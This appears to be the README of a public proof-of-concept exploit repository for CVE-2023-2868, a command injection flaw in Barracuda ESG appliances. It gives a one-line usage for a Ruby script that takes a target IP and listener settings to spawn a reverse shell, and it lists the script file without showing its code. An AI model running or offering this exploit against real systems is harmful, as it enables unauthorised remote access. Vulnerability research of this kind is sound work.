# CVE-2023-2868: Barracuda ESG Command Injection
For full details, read our [AttackerKB Analysis](https://attackerkb.com/topics/2Z0CWopGPX/cve-2023-2868/rapid7-analysis).
## Usage
Set LHOST and RHOST variables to your listener.
```ruby poc_cve_2023_2868.rb <TARGET_IP>```
This will spawn a reverse shell.
[4.0K] /data/pocs/9e72ce65ebb06b52a0da66d952e52116533cf6ad
├── [2.5K] poc_cve_2023_2868.rb
└── [ 310] README.md
0 directories, 2 files